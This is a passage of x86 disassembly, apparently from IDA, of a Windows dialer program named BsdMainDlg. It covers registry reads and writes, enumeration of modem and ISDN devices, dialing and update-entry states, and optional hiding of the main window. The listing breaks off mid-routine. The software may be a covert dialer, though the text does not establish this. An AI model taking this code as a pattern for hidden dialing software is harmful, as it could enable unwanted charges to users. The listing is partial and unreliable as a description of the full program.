call sub_401DD0
push offset asc_40F5D4 ; "\\"
lea ecx, [esp+244h+var_22C]
call sub_402310
mov ecx, [esi+20h]
push 7Ah
push ecx
lea ecx, [esp+248h+var_22C]
call sub_40A1E0
lea edx, [esp+240h+var_234]
push edx
push 20019h
push ebx
lea ecx, [esp+24Ch+var_22C]
call sub_409F60
push eax
push 80000001h
call ds:dword_40F00C ; RegOpenKeyExA
test eax, eax
jnz short loc_407A64
mov edx, [esp+240h+var_234]
mov esi, ds:dword_40F01C
lea eax, [esp+240h+Count]
push eax
push ebx
lea ecx, [esp+248h+var_230]
push ecx
push ebx
push offset aCc ; "cc"
push edx
call esi ; RegQueryValueExA
test eax, eax
jnz short loc_407A55
lea eax, [esp+240h+Count]
push eax
mov eax, [esp+244h+var_234]
lea ecx, [esp+244h+Source]
push ecx
lea edx, [esp+248h+var_230]
push edx
push ebx
push offset aCc ; "cc"
push eax
call esi ; RegQueryValueExA
mov ecx, [esp+240h+Count]
push ecx ; Count
lea edx, [esp+244h+Source]
push edx ; Source
lea eax, [esp+248h+Dest]
push eax ; Dest
call _strncpy
mov ecx, [esp+24Ch+Count]
add esp, 0Ch
mov [esp+ecx+240h+Dest], bl
jmp short loc_407A59
; ---------------------------------------------------------------------------
loc_407A55: ; CODE XREF: sub_407980+90�j
mov [esp+240h+Dest], bl
loc_407A59: ; CODE XREF: sub_407980+D3�j
mov edx, [esp+240h+var_234]
push edx
call ds:dword_40F020 ; RegCloseKey
loc_407A64: ; CODE XREF: sub_407980+6E�j
lea eax, [esp+240h+Dest]
push eax ; char *
call __strdup
mov esi, eax
mov eax, [esp+244h+Memory]
add esp, 4
cmp eax, ebx
jz short loc_407A88
push eax ; Memory
call _free
add esp, 4
mov [esp+240h+Memory], ebx
loc_407A88: ; CODE XREF: sub_407980+F9�j
mov ecx, [esp+240h+var_22C]
push ecx
call ds:dword_40F194
mov eax, esi
pop esi
pop ebx
add esp, 238h
retn
sub_407980 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_407AA0 proc near ; CODE XREF: sub_404890+120�p
var_C = byte ptr -0Ch
sub esp, 0Ch
push esi
push 0Ah
lea eax, [esp+14h+var_C]
push eax
mov esi, ecx
mov ecx, [esi+4]
push 0CEh
push ecx
call ds:dword_40F1F4 ; GetDlgItemTextA
mov ecx, dword_41252C
lea edx, [esp+10h+var_C]
push edx
call sub_4096E0
mov al, [esi+52h]
test al, al
jnz short loc_407ADF
lea eax, [esp+10h+var_C]
push eax
mov ecx, esi
call sub_407750
loc_407ADF: ; CODE XREF: sub_407AA0+31�j
xor eax, eax
pop esi
add esp, 0Ch
retn 10h
sub_407AA0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_407AF0 proc near ; CODE XREF: sub_407D40+144�p
; sub_408350+40�p
var_338 = dword ptr -338h
var_330 = dword ptr -330h
Count = dword ptr -32Ch
Memory = dword ptr -328h
var_324 = dword ptr -324h
var_320 = byte ptr -320h
var_302 = byte ptr -302h
var_300 = byte ptr -300h
var_2F8 = byte ptr -2F8h
var_200 = byte ptr -200h
Dest = byte ptr -1F8h
Source = byte ptr -0F8h
sub esp, 338h
push ebx
push esi
mov esi, ecx
mov eax, [esi+20h]
xor ebx, ebx
push 71h
push eax
lea ecx, [esp+348h+Count]
mov [esp+348h+Count], ebx
mov [esp+348h+Memory], ebx
mov [esp+348h+var_324], ebx
mov [esp+348h+var_320], bl
mov [esp+348h+var_302], bl
call sub_401DD0
push offset asc_40F5D4 ; "\\"
lea ecx, [esp+344h+Count]
call sub_402310
mov ecx, [esi+20h]
push 7Ah
push ecx
lea ecx, [esp+348h+Count]
call sub_40A1E0
lea ecx, [esp+340h+Count]
call sub_409F60
push eax
lea ecx, [esi+24h]
call sub_408B20
test al, al
jnz short loc_407B85
mov ecx, esi
call sub_407540
mov eax, [esp+340h+Memory]
cmp eax, ebx
jz short loc_407B6E
push eax ; Memory
call _free
add esp, 4
mov [esp+340h+Memory], ebx
loc_407B6E: ; CODE XREF: sub_407AF0+6F�j
mov edx, [esp+340h+Count]
push edx
call ds:dword_40F194
pop esi
or eax, 0FFFFFFFFh
pop ebx
add esp, 338h
retn
; ---------------------------------------------------------------------------
loc_407B85: ; CODE XREF: sub_407AF0+60�j
push ebp
push edi
lea eax, [esp+348h+var_338]
push eax
push 20019h
push ebx
lea ecx, [esp+354h+Count]
call sub_409F60
mov edi, ds:dword_40F00C
push eax
push 80000001h
call edi ; RegOpenKeyExA
test eax, eax
mov ebp, ds:dword_40F020
jnz loc_407C99
mov eax, off_4120C4
mov esi, ds:dword_40F01C
lea ecx, [esp+340h+Count]
push ecx
mov ecx, [esp+344h+var_330]
push ebx
lea edx, [esp+348h+Memory]
push edx
push ebx
push eax
push ecx
call esi ; RegQueryValueExA
test eax, eax
jnz short loc_407C25
lea edx, [esp+340h+Count]
push edx
mov edx, off_4120C4
lea eax, [esp+344h+Source]
push eax
mov eax, [esp+348h+var_330]
lea ecx, [esp+348h+Memory]
push ecx
push ebx
push edx
push eax
call esi ; RegQueryValueExA
mov ecx, [esp+340h+Count]
push ecx ; Count
lea edx, [esp+344h+Source]
push edx ; Source
lea eax, [esp+348h+Dest]
push eax ; Dest
call _strncpy
mov ecx, [esp+34Ch+Count]
add esp, 0Ch
mov [esp+ecx+340h+Dest], bl
jmp short loc_407C2C
; ---------------------------------------------------------------------------
loc_407C25: ; CODE XREF: sub_407AF0+E8�j
mov [esp+340h+Dest], bl
loc_407C2C: ; CODE XREF: sub_407AF0+133�j
mov ecx, off_4120C8
lea edx, [esp+340h+Count]
push edx
mov edx, [esp+344h+var_330]
push ebx
lea eax, [esp+348h+Memory]
push eax
push ebx
push ecx
push edx
call esi ; RegQueryValueExA
test eax, eax
jnz short loc_407C8E
lea eax, [esp+340h+Count]
push eax
mov eax, off_4120C8
lea ecx, [esp+344h+Source]
push ecx
mov ecx, [esp+348h+var_330]
lea edx, [esp+348h+Memory]
push edx
push ebx
push eax
push ecx
call esi ; RegQueryValueExA
mov edx, [esp+340h+Count]
push edx ; Count
lea eax, [esp+344h+Source]
push eax ; Source
lea ecx, [esp+348h+var_2F8]
push ecx ; Dest
call _strncpy
mov edx, [esp+34Ch+Count]
add esp, 0Ch
mov [esp+edx+340h+var_2F8], bl
jmp short loc_407C92
; ---------------------------------------------------------------------------
loc_407C8E: ; CODE XREF: sub_407AF0+158�j
mov [esp+340h+var_2F8], bl
loc_407C92: ; CODE XREF: sub_407AF0+19C�j
mov eax, [esp+340h+var_330]
push eax
call ebp ; RegCloseKey
loc_407C99: ; CODE XREF: sub_407AF0+C1�j
mov edx, off_4120C0
lea ecx, [esp+340h+var_330]
push ecx
push 0F003Fh
push ebx
push edx
push 80000001h
call edi ; RegOpenKeyExA
test eax, eax
jnz short loc_407D0A
mov esi, ds:dword_40F084
lea eax, [esp+348h+var_200]
push eax
call esi ; lstrlen
mov edx, off_4120C4
mov edi, ds:dword_40F010
push eax
mov eax, [esp+34Ch+var_338]
lea ecx, [esp+34Ch+var_200]
push ecx
push 1
push ebx
push edx
push eax
call edi ; RegSetValueExA
lea ecx, [esp+348h+var_300]
push ecx
call esi ; lstrlen
mov ecx, [esp+348h+var_338]
push eax
mov eax, off_4120C8
lea edx, [esp+34Ch+var_300]
push edx
push 1
push ebx
push eax
push ecx
call edi ; RegSetValueExA
mov edx, [esp+348h+var_338]
push edx
call ebp ; RegCloseKey
loc_407D0A: ; CODE XREF: sub_407AF0+1C4�j
mov eax, [esp+348h+Memory]
cmp eax, ebx
pop edi
pop ebp
jz short loc_407D21
push eax ; Memory
call _free
add esp, 4
mov [esp+340h+Memory], ebx
loc_407D21: ; CODE XREF: sub_407AF0+222�j
mov eax, [esp+340h+Count]
push eax
call ds:dword_40F194
pop esi
xor eax, eax
pop ebx
add esp, 338h
retn
sub_407AF0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_407D40 proc near ; CODE XREF: sub_404890+35�p
var_A2 = word ptr -0A2h
var_A0 = dword ptr -0A0h
var_9C = dword ptr -9Ch
var_98 = dword ptr -98h
var_94 = dword ptr -94h
var_90 = byte ptr -90h
var_8E = word ptr -8Eh
var_8C = dword ptr -8Ch
var_88 = dword ptr -88h
var_84 = dword ptr -84h
var_80 = dword ptr -80h
Memory = dword ptr -7Ch
var_78 = dword ptr -78h
var_5C = dword ptr -5Ch
var_58 = byte ptr -58h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = byte ptr -44h
var_2C = dword ptr -2Ch
var_26 = byte ptr -26h
var_24 = dword ptr -24h
var_20 = byte ptr -20h
var_2 = byte ptr -2
sub esp, 0A4h
push ebp
mov ebp, ecx
mov eax, [ebp+4]
push 12345h
push 0FFFFFFEBh
push eax
mov byte ptr [ebp+52h], 1
call ds:dword_40F22C ; SetWindowLongA
mov ecx, [ebp+4]
push 0FFFFFFE0h
push ecx
mov [esp+0B0h+var_90], 0
call ds:dword_40F238 ; GetClassWord
mov edx, [ebp+4]
push 0FFFFFFEBh
push edx
mov [esp+0B0h+var_8E], ax
call ds:dword_40F204 ; GetWindowLongA
lea ecx, [esp+0A8h+var_90]
mov [esp+0A8h+var_8C], eax
mov eax, [ebp+4]
push ecx
push offset loc_405C50
mov [esp+0B0h+var_88], eax
call ds:dword_40F1E8 ; EnumWindows
mov al, [esp+0A8h+var_90]
test al, al
jz short loc_407DC4
mov edx, [ebp+4]
push edx
call ds:dword_40F200 ; DestroyWindow
push 0
call ds:dword_40F1D8 ; PostQuitMessage
mov eax, 1
pop ebp
add esp, 0A4h
retn 10h
; ---------------------------------------------------------------------------
loc_407DC4: ; CODE XREF: sub_407D40+61�j
mov eax, [ebp+20h]
push ebx
xor ebx, ebx
push 66h
push eax
lea ecx, [esp+0B4h+var_84]
mov byte ptr [esp+0B4h+var_A2+1], 0
mov [esp+0B4h+var_84], ebx
mov [esp+0B4h+var_80], ebx
mov [esp+0B4h+Memory], ebx
mov byte ptr [esp+0B4h+var_78], bl
mov byte ptr [esp+0B4h+var_5C+2], bl
call sub_401DD0
cmp al, 1
jnz short loc_407E04
lea ecx, [esp+0ACh+var_84]
call sub_409F60
cmp byte ptr [eax], 25h
setnz byte ptr [esp+0ACh+var_A2+1]
loc_407E04: ; CODE XREF: sub_407D40+B1�j
mov ecx, [esp+0ACh+var_84]
push edi
mov edi, ds:dword_40F194
push ecx
call edi
cmp byte ptr [esp+0A8h+var_9C+3], 1
mov [esp+0A8h+Memory], ebx
jz short loc_407E72
mov edx, off_4120D8
push 1
push ebx
push ebx
push edx
push offset aOpen ; "open"
push ebx
call ds:dword_40F1AC
mov eax, [ebp+4]
push eax
call ds:dword_40F200 ; DestroyWindow
push ebx
call ds:dword_40F1D8 ; PostQuitMessage
mov eax, [esp+0ACh+Memory]
cmp eax, ebx
jz short loc_407E5A
push eax ; Memory
call _free
add esp, 4
mov [esp+0ACh+Memory], ebx
loc_407E5A: ; CODE XREF: sub_407D40+10B�j
mov ecx, [esp+0ACh+var_80]
push ecx
call edi
pop edi
pop ebx
mov eax, 1
pop ebp
add esp, 0A4h
retn 10h
; ---------------------------------------------------------------------------
loc_407E72: ; CODE XREF: sub_407D40+DB�j
push esi
mov ecx, ebp
mov [ebp+60h], ebx
mov byte ptr [ebp+58h], 0
mov byte ptr [ebp+59h], 0
mov byte ptr [ebp+5Ah], 0
call sub_407AF0
mov ecx, ebp
mov [ebp+5Ch], ebx
call sub_407980
mov ecx, eax
mov [ebp+5Ch], eax
lea esi, [ecx+1]
jmp short loc_407EA0
; ---------------------------------------------------------------------------
align 10h
loc_407EA0: ; CODE XREF: sub_407D40+15B�j
; sub_407D40+165�j
mov dl, [ecx]
inc ecx
test dl, dl
jnz short loc_407EA0
sub ecx, esi
mov [esp+0ACh+var_94], ecx
jz short loc_407ECB
mov edi, offset aXx_0 ; "xx"
mov esi, eax
mov ecx, 3
xor edx, edx
repe cmpsb
jnz loc_407F51
mov edi, ds:dword_40F194
loc_407ECB: ; CODE XREF: sub_407D40+16D�j
mov ecx, ebp
call sub_4066F0
test eax, eax
mov ecx, ebp
jge short loc_407F1E
push 73h
call sub_405FB0
mov eax, [ebp+4]
push eax
call ds:dword_40F200 ; DestroyWindow
push ebx
call ds:dword_40F1D8 ; PostQuitMessage
mov eax, [esp+0B0h+Memory]
cmp eax, ebx
jz short loc_407F05
push eax ; Memory
call _free
add esp, 4
mov [esp+0B0h+Memory], ebx
loc_407F05: ; CODE XREF: sub_407D40+1B6�j
mov ecx, [esp+0B0h+var_80]
push ecx
call edi
pop esi
pop edi
pop ebx
mov eax, 1
pop ebp
add esp, 0A4h
retn 10h
; ---------------------------------------------------------------------------
loc_407F1E: ; CODE XREF: sub_407D40+196�j
call sub_407980
mov [ebp+5Ch], eax
lea edx, [eax+1]
lea esp, [esp+0]
loc_407F30: ; CODE XREF: sub_407D40+1F5�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_407F30
sub eax, edx
mov [esp+0ACh+var_94], eax
jnz short loc_407F51
push 73h
mov ecx, ebp
call sub_405FB0
mov edx, [ebp+4]
push edx
jmp loc_4080A6
; ---------------------------------------------------------------------------
loc_407F51: ; CODE XREF: sub_407D40+17F�j
; sub_407D40+1FD�j
push 604h ; unsigned int
call ??2@YAPAXI@Z ; operator new(uint)
add esp, 4
cmp eax, ebx
jz loc_408093
mov ecx, eax
call sub_409990
cmp eax, ebx
mov dword_41252C, eax
jz loc_408099
mov ecx, eax
call sub_4099A0
test al, al
jz loc_408099
mov ecx, ebp
call sub_406390
mov eax, [ebp+20h]
push 75h
push eax
lea ecx, [esp+0B4h+var_50]
mov [esp+0B4h+var_50], ebx
mov [esp+0B4h+var_4C], ebx
mov [esp+0B4h+var_48], ebx
mov [esp+0B4h+var_44], 0
mov [esp+0B4h+var_26], 0
call sub_401DD0
mov eax, [esp+0ACh+var_50]
cmp eax, ebx
jz short loc_407FCB
push eax
call ds:dword_40F188
cmp eax, ebx
jnz short loc_407FDA
loc_407FCB: ; CODE XREF: sub_407D40+27E�j
mov ecx, [ebp+20h]
push 76h
push ecx
lea ecx, [esp+0B4h+var_50]
call sub_401DD0
loc_407FDA: ; CODE XREF: sub_407D40+289�j
lea ecx, [esp+0ACh+var_50]
call sub_409F60
mov edx, [ebp+4]
push eax
push edx
call ds:dword_40F1F8 ; SetWindowTextA
push 385h
push 1
mov ecx, ebp
call sub_406060
push 70h
push 0CDh
mov ecx, ebp
call sub_406060
mov eax, [ebp+20h]
push 7Ah
push eax
lea ecx, [esp+0BCh+var_2C]
mov [esp+0BCh+var_2C], ebx
mov [esp+94h], ebx
mov [esp+0BCh+var_24], ebx
mov [esp+0BCh+var_20], 0
mov [esp+0BCh+var_2], 0
call sub_401DD0
mov al, [ebp+51h]
test al, al
jz short loc_408053
mov ecx, dword_41252C
call sub_409980
loc_408053: ; CODE XREF: sub_407D40+306�j
lea ecx, [esp+0B4h+var_2C]
call sub_409F60
mov ecx, dword_41252C
push eax
call sub_409530
test eax, eax
jz short loc_4080CE
push 1F9h
call ds:dword_40F068 ; RtlGetLastWin32Error
push eax
push 27Dh
push offset a_Bsdmaindlg_cp ; ".\\BsdMainDlg.cpp"
push ebp
call sub_406210
add esp, 14h
jmp loc_4081ED
; ---------------------------------------------------------------------------
loc_408093: ; CODE XREF: sub_407D40+220�j
mov dword_41252C, ebx
loc_408099: ; CODE XREF: sub_407D40+234�j
; sub_407D40+243�j
push 73h
mov ecx, ebp
call sub_405FB0
mov ecx, [ebp+4]
push ecx
loc_4080A6: ; CODE XREF: sub_407D40+20C�j
call ds:dword_40F200 ; DestroyWindow
push ebx
call ds:dword_40F1D8 ; PostQuitMessage
loc_4080B3: ; CODE XREF: sub_407D40+4C2�j
lea ecx, [esp+0B4h+var_84]
call sub_401D10
pop esi
pop edi
pop ebx
mov eax, 1
pop ebp
add esp, 0A4h
retn 10h
; ---------------------------------------------------------------------------
loc_4080CE: ; CODE XREF: sub_407D40+32D�j
mov ecx, dword_41252C
call sub_4096C0
mov ecx, dword_41252C
mov [esp+0B4h+var_A0], eax
call sub_409460
cmp eax, ebx
mov [esp+0B4h+var_9C], eax
mov byte ptr [esp+0B4h+var_A2+1], 0
mov [esp+0B4h+var_98], 0FFFFFFFFh
jle loc_4081E6
test eax, eax
mov [esp+0B4h+var_94], ebx
jle loc_4081E6
mov edi, ds:dword_40F1C4
loc_408113: ; CODE XREF: sub_407D40+498�j
mov ecx, dword_41252C
push ebx
call sub_4094A0
mov esi, eax
push offset aModem ; "modem"
push esi
call ds:dword_40F0B8 ; lstrcmp
test eax, eax
jz short loc_408145
push offset aIsdn ; "isdn"
push esi
call ds:dword_40F0B8 ; lstrcmp
test eax, eax
jnz loc_4081D1
loc_408145: ; CODE XREF: sub_407D40+3EF�j
mov edx, [esp+0B4h+var_94]
mov ecx, dword_41252C
inc edx
push ebx
mov [esp+0B8h+var_94], edx
call sub_409470
mov ecx, [ebp+4]
mov esi, eax
push esi
push 0
push 143h
push 0C9h
push ecx
call edi ; SendDlgItemMessageA
cmp [esp+0B4h+var_98], 0FFFFFFFFh
jnz short loc_40817A
mov [esp+0B4h+var_98], ebx
loc_40817A: ; CODE XREF: sub_407D40+434�j
mov edx, [esp+0B4h+var_A0]
cmp byte ptr [edx], 0
jnz short loc_40819E
mov ecx, dword_41252C
push ebx
call sub_409AD0
mov ecx, dword_41252C
call sub_4096C0
mov [esp+0B4h+var_A0], eax
loc_40819E: ; CODE XREF: sub_407D40+441�j
mov al, byte ptr [esp+0B4h+var_A2+1]
test al, al
jnz short loc_4081D1
mov eax, [esp+0B4h+var_A0]
push esi
push eax
call ds:dword_40F0B8 ; lstrcmp
test eax, eax
jnz short loc_4081D1
mov ecx, [esp+0B4h+var_A0]
mov edx, [ebp+4]
push ecx
push eax
push 14Dh
push 0C9h
push edx
call edi ; SendDlgItemMessageA
mov byte ptr [esp+0B4h+var_A2+1], 1
loc_4081D1: ; CODE XREF: sub_407D40+3FF�j
; sub_407D40+464�j ...
mov eax, [esp+0B4h+var_9C]
inc ebx
cmp ebx, eax
jl loc_408113
mov eax, [esp+0B4h+var_94]
test eax, eax
jnz short loc_408207
loc_4081E6: ; CODE XREF: sub_407D40+3BB�j
; sub_407D40+3C7�j
mov ecx, ebp
call sub_405CC0
loc_4081ED: ; CODE XREF: sub_407D40+34E�j
lea ecx, [esp+0B4h+var_2C]
call sub_401D10
lea ecx, [esp+0B4h+var_58]
call sub_401D10
jmp loc_4080B3
; ---------------------------------------------------------------------------
loc_408207: ; CODE XREF: sub_407D40+4A4�j
mov al, byte ptr [esp+0B4h+var_A2+1]
test al, al
jnz short loc_40823D
mov eax, [esp+0B4h+var_98]
mov ecx, dword_41252C
push eax
call sub_409AD0
mov ecx, dword_41252C
call sub_4096C0
mov ecx, [ebp+4]
push eax
push 0
push 14Dh
push 0C9h
push ecx
call edi ; SendDlgItemMessageA
loc_40823D: ; CODE XREF: sub_407D40+4CD�j
lea ecx, [ebp+24h]
call sub_408E40
mov edx, [ebp+4]
push 0
push 2
push 0C5h
push 0CEh
push edx
call edi ; SendDlgItemMessageA
mov ecx, dword_41252C
call sub_4096D0
push eax
push 0CEh
mov ecx, ebp
call sub_405E80
mov eax, [ebp+4]
mov esi, ds:dword_40F1CC
push 0CEh
push eax
call esi ; GetDlgItem
mov edi, ds:dword_40F1F0
push 1
push eax
call edi ; EnableWindow
mov ecx, [ebp+4]
push 0C9h
push ecx
call esi ; GetDlgItem
push 1
push eax
call edi ; EnableWindow
mov edx, [ebp+4]
push 1
push edx
call esi ; GetDlgItem
push 1
push eax
call edi ; EnableWindow
mov eax, [ebp+4]
push 0CEh
push eax
call esi ; GetDlgItem
push eax
call ds:dword_40F20C ; SetFocus
mov ecx, [ebp+20h]
push 0
push 0
push 0
push 1
push 32h
push ecx
call ds:dword_40F1EC ; LoadImageA
mov edx, [ebp+4]
push eax
push 1
push 80h
push edx
call ds:dword_40F1FC ; SendMessageA
mov ecx, dword_41252C
call sub_409E10
mov ecx, ebp
call sub_407820
mov al, [ebp+50h]
test al, al
jz short loc_408317
mov eax, [ebp+4]
push 1
push eax
call esi ; GetDlgItem
test eax, eax
jz short loc_408317
push 0
push 0
push 0F5h
push eax
call ds:dword_40F1D4 ; PostMessageA
loc_408317: ; CODE XREF: sub_407D40+5B9�j
; sub_407D40+5C5�j
lea ecx, [esp+0B4h+var_2C]
mov byte ptr [ebp+52h], 0
call sub_401D10
lea ecx, [esp+0B4h+var_58]
call sub_401D10
lea ecx, [esp+0B4h+var_84]
call sub_401D10
pop esi
pop edi
pop ebx
xor eax, eax
pop ebp
add esp, 0A4h
retn 10h
sub_407D40 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_408350 proc near ; CODE XREF: sub_404890+F2�p
var_88 = dword ptr -88h
var_84 = dword ptr -84h
Memory = dword ptr -80h
var_7C = dword ptr -7Ch
var_78 = byte ptr -78h
var_5A = byte ptr -5Ah
var_58 = byte ptr -58h
var_2C = byte ptr -2Ch
sub esp, 88h
push ebx
xor ebx, ebx
push esi
mov esi, ecx
mov ecx, dword_41252C
mov [esp+90h+var_84], ebx
mov [esp+90h+Memory], ebx
mov [esp+90h+var_7C], ebx
mov [esp+90h+var_78], bl
mov [esp+90h+var_5A], bl
call sub_4098E0
cmp eax, 0E10h
jle short loc_4083BB
mov eax, [esi+4]
push 1
push eax
call ds:dword_40F1BC ; KillTimer
mov ecx, esi
call sub_407AF0
mov ecx, dword_41252C
push 0BB8h
call sub_4097C0
mov ecx, [esi+4]
push ecx
call ds:dword_40F200 ; DestroyWindow
push ebx
call ds:dword_40F1D8 ; PostQuitMessage
jmp loc_4088B0 ; default
; ---------------------------------------------------------------------------
loc_4083BB: ; CODE XREF: sub_408350+30�j
mov eax, [esi+60h]
cmp eax, 9 ; switch 10 cases
ja loc_4088B0 ; default
push ebp
push edi
jmp ds:off_4088E0[eax*4] ; switch jump
loc_4083D0: ; DATA XREF: .text:off_4088E0�o
cmp ds:byte_40F7F9, bl ; jumptable 004083C9 case 1
jz short loc_4083E3
mov eax, [esi+4]
push ebx
push eax
call ds:dword_40F228 ; ShowWindow
loc_4083E3: ; CODE XREF: sub_408350+86�j
push 1F5h
push esi
mov dword ptr [esi+60h], 2
call sub_405D70
add esp, 8
push 386h
push 1
mov ecx, esi
call sub_406060
mov ecx, dword_41252C
call sub_409860
push 1FBh
push esi
call sub_405D70
add esp, 8
jmp loc_4088AE
; ---------------------------------------------------------------------------
loc_408424: ; CODE XREF: sub_408350+79�j
; DATA XREF: .text:off_4088E0�o
cmp ds:byte_40F7F9, bl ; jumptable 004083C9 case 2
jz short loc_408437
mov ecx, [esi+4]
push ebx
push ecx
call ds:dword_40F228 ; ShowWindow
loc_408437: ; CODE XREF: sub_408350+DA�j
mov ecx, dword_41252C
call sub_409930
test eax, eax
jg loc_4088AE
lea edx, [esp+98h+var_88]
mov dword ptr [esi+60h], 5
mov ecx, dword_41252C
push edx
call sub_409BC0
mov ecx, [esp+98h+var_88]
cmp ecx, ebx
jz loc_4088AE
push ecx
push eax
mov ecx, esi
call sub_4065D0
jmp loc_4088AE
; ---------------------------------------------------------------------------
loc_40847B: ; CODE XREF: sub_408350+79�j
; DATA XREF: .text:off_4088E0�o
cmp ds:byte_40F7F9, bl ; jumptable 004083C9 case 3
jz short loc_40848E
mov eax, [esi+4]
push ebx
push eax
call ds:dword_40F228 ; ShowWindow
loc_40848E: ; CODE XREF: sub_408350+131�j
push 386h
push 1
mov ecx, esi
mov dword ptr [esi+60h], 4
call sub_406060
mov ecx, dword_41252C
push 0BB8h
call sub_4097C0
jmp loc_4088AE
; ---------------------------------------------------------------------------
loc_4084B8: ; CODE XREF: sub_408350+79�j
; DATA XREF: .text:off_4088E0�o
cmp ds:byte_40F7F9, bl ; jumptable 004083C9 case 4
jz short loc_4084CB
mov ecx, [esi+4]
push ebx
push ecx
call ds:dword_40F228 ; ShowWindow
loc_4084CB: ; CODE XREF: sub_408350+16E�j
mov ecx, dword_41252C
lea edx, [esp+98h+var_88]
push edx
call sub_409BC0
cmp eax, 2001h
jnz short loc_4084E9
mov dword ptr [esi+60h], 5
loc_4084E9: ; CODE XREF: sub_408350+190�j
mov ecx, [esp+98h+var_88]
cmp ecx, ebx
jz loc_4088AE
push ecx
push eax
mov ecx, esi
call sub_4065D0
jmp loc_4088AE
; ---------------------------------------------------------------------------
loc_408503: ; CODE XREF: sub_408350+79�j
; DATA XREF: .text:off_4088E0�o
cmp ds:byte_40F7F9, bl ; jumptable 004083C9 case 5
jz short loc_408516
mov eax, [esi+4]
push ebx
push eax
call ds:dword_40F228 ; ShowWindow
loc_408516: ; CODE XREF: sub_408350+1B9�j
mov dword ptr [esi+60h], 6
mov ecx, dword_41252C
call sub_409E10
mov edi, eax
cmp edi, ebx
jz short loc_408560
lea ecx, [esp+98h+var_84]
push ecx
push edi
lea edx, [esp+0A0h+var_58]
push edx
mov ecx, esi
call sub_406580
mov ecx, eax
call sub_409F60
push eax
push edi
push offset aUpdateentryDS ; "UpdateEntry: %d - %s"
push esi
call sub_405E40
add esp, 10h
lea ecx, [esp+98h+var_58]
call sub_401D10
loc_408560: ; CODE XREF: sub_408350+1DC�j
mov ecx, dword_41252C
call sub_409D70
mov edi, eax
cmp edi, ebx
jz short loc_4085AF
lea eax, [esp+98h+var_84]
push eax
push edi
lea ecx, [esp+0A0h+var_2C]
push ecx
mov ecx, esi
mov dword ptr [esi+60h], 8
call sub_406580
mov ecx, eax
call sub_409F60
push eax
push edi
push offset aDialDS ; "Dial: %d - %s"
push esi
call sub_405E40
add esp, 10h
lea ecx, [esp+98h+var_2C]
call sub_401D10
jmp loc_4088AE
; ---------------------------------------------------------------------------
loc_4085AF: ; CODE XREF: sub_408350+21F�j
mov dword_412538, 0Ah
jmp loc_4088AE
; ---------------------------------------------------------------------------
loc_4085BE: ; CODE XREF: sub_408350+79�j
; DATA XREF: .text:off_4088E0�o
cmp ds:byte_40F7F9, bl ; jumptable 004083C9 case 6
mov edi, ds:dword_40F228
jz short loc_4085D3
mov edx, [esi+4]
push ebx
push edx
call edi ; ShowWindow
loc_4085D3: ; CODE XREF: sub_408350+27A�j
mov ecx, dword_41252C
lea eax, [esp+98h+var_88]
push eax
call sub_409BC0
mov ebp, eax
sub eax, 2000h
jz short loc_408625
dec eax
jnz loc_40868E
mov eax, dword_412538
mov ecx, eax
dec eax
test ecx, ecx
mov dword_412538, eax
jg loc_40868E
mov edx, [esp+98h+var_88]
push edx
push ebp
mov ecx, esi
mov byte ptr [esi+59h], 1
mov dword ptr [esi+60h], 8
call sub_4065D0
jmp loc_4088AE
; ---------------------------------------------------------------------------
loc_408625: ; CODE XREF: sub_408350+29A�j
push 387h
push 1
mov ecx, esi
mov dword ptr [esi+60h], 7
call sub_406060
mov ecx, dword_41252C
call sub_409E10
cmp ds:byte_40F7F9, bl
jnz short loc_408655
mov edx, [esi+4]
push 2
push edx
call edi ; ShowWindow
loc_408655: ; CODE XREF: sub_408350+2FB�j
mov eax, [esi+5Ch]
push eax ; Str1
mov ecx, esi
call sub_406FE0
push offset aXx_0 ; "xx"
mov ecx, esi
call sub_406FE0
lea ecx, [esi+24h]
call sub_408FA0
push eax
mov ecx, esi
call sub_405BC0
mov ecx, [esi+4]
push ebx
push 3E8h
push 1
push ecx
call ds:dword_40F1C0 ; SetTimer
loc_40868E: ; CODE XREF: sub_408350+29D�j
; sub_408350+2B2�j
mov edx, [esp+98h+var_88]
push edx
push ebp
mov ecx, esi
call sub_4065D0
jmp loc_4088AE
; ---------------------------------------------------------------------------
loc_4086A0: ; CODE XREF: sub_408350+79�j
; DATA XREF: .text:off_4088E0�o
cmp ds:byte_40F7F9, bl ; jumptable 004083C9 case 7
jz short loc_4086B3
mov eax, [esi+4]
push ebx
push eax
call ds:dword_40F228 ; ShowWindow
loc_4086B3: ; CODE XREF: sub_408350+356�j
lea ecx, [esp+98h+var_88]
mov byte ptr [esi+58h], 1
push ecx
mov ecx, dword_41252C
call sub_409BC0
mov edi, eax
cmp edi, 2001h
jnz short loc_4086EA
mov edx, [esi+4]
push ebx
push 0FAh
push 1
push edx
mov dword ptr [esi+60h], 8
call ds:dword_40F1C0 ; SetTimer
loc_4086EA: ; CODE XREF: sub_408350+37F�j
mov eax, [esp+98h+var_88]
push eax
push edi
mov ecx, esi
call sub_4065D0
jmp loc_4088AE
; ---------------------------------------------------------------------------
loc_4086FC: ; CODE XREF: sub_408350+79�j
; DATA XREF: .text:off_4088E0�o
cmp ds:byte_40F7F9, bl ; jumptable 004083C9 case 8
jz short loc_40870F
mov ecx, [esi+4]
push ebx
push ecx
call ds:dword_40F228 ; ShowWindow
loc_40870F: ; CODE XREF: sub_408350+3B2�j
push 386h
push 1
mov ecx, esi
mov dword ptr [esi+60h], 9
call sub_406060
mov ecx, dword_41252C
push 0BB8h
call sub_4097C0
mov edx, [esi+4]
push ebx
push 0FAh
push 1
push edx
call ds:dword_40F1C0 ; SetTimer
jmp loc_4088AE
; ---------------------------------------------------------------------------
loc_40874B: ; CODE XREF: sub_408350+79�j
; DATA XREF: .text:off_4088E0�o
cmp ds:byte_40F7F9, bl ; jumptable 004083C9 case 9
jz short loc_40875E
mov eax, [esi+4]
push ebx
push eax
call ds:dword_40F228 ; ShowWindow
loc_40875E: ; CODE XREF: sub_408350+401�j
lea ecx, [esp+98h+var_88]
push ecx
mov ecx, dword_41252C
call sub_409BC0
cmp eax, 2001h
jnz short loc_408778
mov [esi+60h], ebx
loc_408778: ; CODE XREF: sub_408350+423�j
mov edx, [esp+98h+var_88]
push edx
